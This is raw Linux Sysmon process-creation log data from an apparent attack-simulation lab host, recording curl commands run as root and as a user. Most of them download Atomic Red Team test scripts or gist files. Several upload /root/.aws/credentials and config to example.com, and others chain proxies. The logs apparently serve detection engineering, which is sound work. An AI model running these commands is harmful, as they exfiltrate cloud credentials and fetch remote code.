154100x800000000000000094477763Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:50:35.117{ec28c72e-0fdb-62e4-782d-e0fe87550000}23596/usr/bin/curl-----curl -sO https://gist.githubusercontent.com/MHaggis/f3c6091d189ac6ed73b55a7c0e7f4d68/raw/e0f1faca6487bc92fa5e56615aa91335090db47a/test.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094477535Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:50:30.423{ec28c72e-0fd6-62e4-780d-27b20c560000}23592/usr/bin/curl-----curl -sO https://gist.githubusercontent.com/MHaggis/f3c6091d189ac6ed73b55a7c0e7f4d68/raw/e0f1faca6487bc92fa5e56615aa91335090db47a/test.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094472493Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:48:55.183{ec28c72e-0f77-62e4-781d-5c1a9a550000}23541/usr/bin/curl-----curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094469878Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:48:43.279{ec28c72e-0f6b-62e4-782d-8b2f84550000}23534/usr/bin/curl-----curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094468840Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:48:30.960{ec28c72e-0f5e-62e4-788d-a0e78f550000}23529/usr/bin/curl-----curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094468546Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:48:23.525{ec28c72e-0f57-62e4-78ed-bcd46b550000}23522/usr/bin/curl-----curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094464232Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:47:18.725{ec28c72e-0f16-62e4-78bd-82e05d550000}23501/usr/bin/curl-----curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh /tmp/echoartfish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094463215Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:46:48.968{ec28c72e-0ef8-62e4-788d-a6da4e560000}23485/usr/bin/curl-----curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094460534Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:46:37.978{ec28c72e-0eed-62e4-78ad-4b3028560000}23473/usr/bin/curl-----curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094458051Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:45:18.134{ec28c72e-0e9e-62e4-786d-bc89ab550000}23455/usr/bin/curl-----curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094457397Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:44:51.978{ec28c72e-0e83-62e4-780d-fa5a13560000}23438/usr/bin/curl-----curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094456539Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:44:38.053{ec28c72e-0e76-62e4-788d-b2349b550000}23434/usr/bin/curl-----curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094455212Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:43:22.497{ec28c72e-0e2a-62e4-78ad-3268be550000}23427/usr/bin/curl-----curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh /tmp/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094454149Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:43:05.046{ec28c72e-0e19-62e4-782d-c19dfa550000}23423/usr/bin/curl-----curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh /tmp/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094453922Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:42:58.150{ec28c72e-0e12-62e4-78ed-4f4774550000}23419/usr/bin/curl-----curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh /tmp/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094452919Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:42:16.671{ec28c72e-0de8-62e4-78dd-fab9d7550000}23414/usr/bin/curl-----curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094452498Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:42:07.535{ec28c72e-0ddf-62e4-78fd-a137b1550000}23409/usr/bin/curl-----curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094452061Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:41:29.119{ec28c72e-0db9-62e4-782d-bf281d560000}23383/usr/bin/curl-----curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094451336Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:41:18.735{ec28c72e-0dae-62e4-783d-510aac550000}23380/usr/bin/curl-----curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094451087Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:41:12.557{ec28c72e-0da8-62e4-786d-7af9c4550000}23376/usr/bin/curl-----curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094450692Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:40:28.938{ec28c72e-0d7c-62e4-781d-9d4866550000}23371/usr/bin/curl-----curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094449712Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:40:12.064{ec28c72e-0d6c-62e4-785d-9178f3550000}23365/usr/bin/curl-----curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094447472Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:38:24.312{ec28c72e-0d00-62e4-784d-26e689550000}23356/usr/bin/curl-----curl -sO https://gist.githubusercontent.com/MHaggis/b7fe00e3f4b12de4dc302ad3b0a9b26f/raw/5f6b35cce55d038403bbc38272f45853ea42c390/test.mof /tmp/test.mof/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094447215Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:38:15.347{ec28c72e-0cf7-62e4-78ed-32828d550000}23352/usr/bin/curl-----curl -sO https://gist.githubusercontent.com/MHaggis/b7fe00e3f4b12de4dc302ad3b0a9b26f/raw/5f6b35cce55d038403bbc38272f45853ea42c390/test.mof /tmp//home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094443619Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:36:24.578{ec28c72e-0c88-62e4-78cd-bc06f4550000}23333/usr/bin/curl-----curl -sO https://gist.githubusercontent.com/MHaggis/b7fe00e3f4b12de4dc302ad3b0a9b26f/raw/5f6b35cce55d038403bbc38272f45853ea42c390/test.mof/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094443235Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 16:36:19.617{ec28c72e-0c83-62e4-78fd-420057550000}23312/usr/bin/curl-----curl -sO https://gist.githubusercontent.com/MHaggis/b7fe00e3f4b12de4dc302ad3b0a9b26f/raw/5f6b35cce55d038403bbc38272f45853ea42c390/test.mof/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094131062Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 14:27:06.976{ec28c72e-ee3a-62e3-789d-16e148560000}23112/usr/bin/curl-----curl -sO https://gist.githubusercontent.com/MHaggis/b7fe00e3f4b12de4dc302ad3b0a9b26f/raw/5f6b35cce55d038403bbc38272f45853ea42c390/test.mof/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000094128420Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 14:26:17.353{ec28c72e-ee09-62e3-78dd-38347a550000}23108/usr/bin/curl-----curl -sO https://gist.githubusercontent.com/MHaggis/b7fe00e3f4b12de4dc302ad3b0a9b26f/raw/5f6b35cce55d038403bbc38272f45853ea42c390/test.mofhttps://gist.githubusercontent.com/MHaggis/b7fe00e3f4b12de4dc302ad3b0a9b26f/raw/5f6b35cce55d038403bbc38272f45853ea42c390/test.mof/home/ubunturoot{ec28c72e-0000-0000-0000-000000000000}0751no level-{ec28c72e-edb1-62e3-4884-14ef6f550000}23094/bin/bashbashroot
154100x800000000000000093804932Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 12:06:55.222{ec28c72e-cd5f-62e3-78cd-b3690d560000}22871/usr/bin/curl-----curl --preproxy socks5://proxy.example -x http://http.example https://example.com/home/ubuntuubuntu{ec28c72e-caa1-62e3-e803-000000000000}1000751no level-{ec28c72e-caa1-62e3-48c4-b8cb06560000}22840/bin/bash-bashubuntu
154100x800000000000000093804846Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 12:06:54.257{ec28c72e-cd5e-62e3-785d-93e58d550000}22870/usr/bin/curl-----curl -x http://user:pwd@ curl --preproxy socks5://proxy.example -x http://http.example https://example.com127.0.0.1:1234 http://httpbin.org/ip/home/ubuntuubuntu{ec28c72e-caa1-62e3-e803-000000000000}1000751no level-{ec28c72e-caa1-62e3-48c4-b8cb06560000}22840/bin/bash-bashubuntu
154100x800000000000000093868841Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 12:34:50.383{ec28c72e-d3ea-62e3-782d-328196550000}22917/usr/bin/curl-----curl -F userfile=@/root/.aws/credentials http://example.com/home/ubuntuubuntu{ec28c72e-caa1-62e3-e803-000000000000}1000751no level-{ec28c72e-caa1-62e3-48c4-b8cb06560000}22840/bin/bash-bashubuntu
154100x800000000000000093864882Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 12:33:26.186{ec28c72e-d396-62e3-782d-b124e8550000}22911/usr/bin/curl-----curl -F userfile=@/root/.aws/config http://example.com/home/ubuntuubuntu{ec28c72e-caa1-62e3-e803-000000000000}1000751no level-{ec28c72e-caa1-62e3-48c4-b8cb06560000}22840/bin/bash-bashubuntu
154100x800000000000000093863963Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 12:33:14.610{ec28c72e-d38a-62e3-78ad-379917560000}22910/usr/bin/curl-----curl -F “userfile=@/root/.aws/config” hxxp://example.com/home/ubuntuubuntu{ec28c72e-caa1-62e3-e803-000000000000}1000751no level-{ec28c72e-caa1-62e3-48c4-b8cb06560000}22840/bin/bash-bashubuntu
154100x800000000000000093863850Linux-Sysmon/Operationalsysmonlinux-mhaag-attack-range-8786-2022-07-29 12:33:13.542{ec28c72e-d389-62e3-788d-737768550000}22909/usr/bin/curl-----curl -F curl -F “userfile=@/root/.aws/config” hxxp://example.com/home/ubuntuubuntu{ec28c72e-caa1-62e3-e803-000000000000}1000751no level-{ec28c72e-caa1-62e3-48c4-b8cb06560000}22840/bin/bash-bashubuntu